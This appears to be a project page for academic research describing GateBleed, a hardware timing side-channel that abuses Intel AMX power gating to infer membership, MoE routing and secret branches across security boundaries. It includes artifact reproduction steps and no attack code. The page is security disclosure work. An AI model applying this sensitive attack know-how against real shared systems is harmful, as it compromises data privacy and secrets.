Gatebleed

Exploiting Power Gating for Stealthy AI Timing Attacks

A new hardware side-channel that turns a power optimization into a high-signal timing leak — the first hardware-only membership inference attack on AI accelerators.

Overview

GateBleed is a newly discovered microarchitectural side-channel affecting Intel’s Advanced Matrix Extensions (AMX) and potentially other AI accelerators.

It exploits the staged power-gating mechanism designed to improve performance-per-watt in AI workloads.

When AMX or similar accelerators wake from deep power states, they incur a large, repeatable latency penalty — up to ~20,000 CPU cycles — which can be measured remotely and used to infer sensitive information.

Microarchitectural side-channel attacks exploit the specific implementation of a processor’s instruction-set architecture (e.g., x86, ARM). Unlike traditional malware, these attacks leverage benign code paths that unintentionally reveal information about a victim’s workload through measurable side effects. The landmark examples—Spectre and Meltdown (2018)—show how performance optimizations can be a double-edged sword: enabling high performance while simultaneously exposing systems to new classes of attacks.

The end of Dennard Scaling, the principle that shrinking transistors increases density without significantly raising power consumption, has further complicated matters. To reduce power use, modern processors aggressively power-gate idle components. However, the resulting wake-up latency creates observable patterns that attackers can exploit to infer component usage. Similarly, AI workloads are power-intensive. To cope, practitioners employ software-level model gating optimizations such as early exiting and mixture-of-experts. GateBleed demonstrates that these optimizations introduce uneven hardware utilization, enabling privacy attacks against AI models; GateBleed is the first demonstration of data privacy being compromised through power optimization. Unlike Spectre and Meltdown, which exploit fundamentally limited performance optimizations, power gating and model gating are likely to become even more widespread as the demand for ever-larger AI models grows in the post-Dennard Scaling era, increasing the potential for GateBleed attacks.

Our peer-reviewed paper, “GATEBLEED: Exploiting On-Core Accelerator Power Gating for High Performance & Stealthy Attacks on AI”, has been accepted at MICRO 2025.

Read the preprint on arXiv

Key Findings

Power optimization backfire: Latency penalties from AMX’s cold-start wakeups create a strong timing signal.
First hardware-only membership attack: 81% accuracy (precision 0.89) on an early-exit Transformer without any access to logits or model outputs.
Broader AI privacy impact:
- 100% accurate Mixture-of-Experts (MoE) routing inference
- Leakage of secret control-flow decisions across OS, VM, and SGX boundaries
Cross-platform relevance: Preliminary tests confirm similar power-gating patterns on NVIDIA A100 GPUs.

How GateBleed Works

Power Gating in AI Accelerators
- To save energy, AMX units shut down between uses.
- Waking from a deep state takes significantly longer than from a shallow state.
Measurable Latency Gap
- The first matmul after wake-up pays a “cold-start” cost: ~20,000 cycles in AMX.
Turning Latency into Leakage
- By carefully scheduling and timing operations, attackers can determine if a model took a specific execution path (e.g., selected an MoE expert, exited early).
Remote Feasibility
- The signal remains robust over a one-hop network and achieves a 70,000× higher transmission rate than NetSpectre using our amplification gadget.

Impact

Cloud AI deployments: Multi-tenant environments with shared accelerators are especially vulnerable.
Privacy threats: Enables label leakage, membership inference, and watermark recovery without model outputs.
Mitigation challenges: Standard defenses like cache partitioning, timer fuzzing, and speculation barriers are ineffective.

Technical Resources

Research Paper (arXiv Preprint)
Proof-of-Concept demo (MICRO artifact evaluation link — placeholder for now)
Intel PSIRT Guidance on Constant-Time Programming (note: does not mitigate MoE variant)

Artifact URL

https://github.com/jkalya/gatebleed

Badges Applied For

Artifact Available
Artifact Evaluated – Functional
Results Reproduced

Hardware Dependencies (if any)

In our experiments, we used the Lenovo SRV-650 V3 server with UEFI version 3.14. The CPU we used was the Intel Xeon Gold 5420+ but any CPU with Intel AMX should work. If using a remote system in artifacts 03 and 04, you can use any Intel x86 system running any Linux distribution.

Software Dependency (if any)

We found the attack works best when using Linux kernel version 5.14.0-427. We found later versions of the kernel don’t show as many performance stages. We tested on both RHEL 9.4 and Ubuntu 22.04. To run 02_performance_stages_in_sgx, we need the Intel SGX SDK available at \hyperlink{https://github.com/intel/linux-sgx}{https://github.com/intel/linux-sgx}. We use Python 3.9.21 but any version of Python 3 should work. All other artifacts do not have any other external dependencies.

Key Results to be Reproduced

01 – Observation of the performance stages that constitute the backbone of the GATEBLEED attack

02 – Observation of these performance stages even within an Intel SGX enclave, making GATEBLEED exploitable within SGX

03 – Remote GATEBLEED covert channel. Server sends a “0” by not running an AMX operation, a “1” by running an AMX operation. Client then requests a server endpoint that unconditionally runs an AMX operation and measures the response time, inferring if the Server used AMX recently

04 – Remote GATEBLEED Spectre-v1 attack. Attacking client has knowledge of a branch on the victim server that conditionally executes an AMX operation based on the value of a secret bit.

05 – Custom implementation of a transformer model that uses AMX whenever possible for inference. End-to-end runtime of model inference varies based on if the inference started while AMX was warm or cold

06 – Membership inference attack on an entropy-based early-exiting transformer model

07 – Membership Inference attack of early exit CNN model

Estimated Completion Time

40 minutes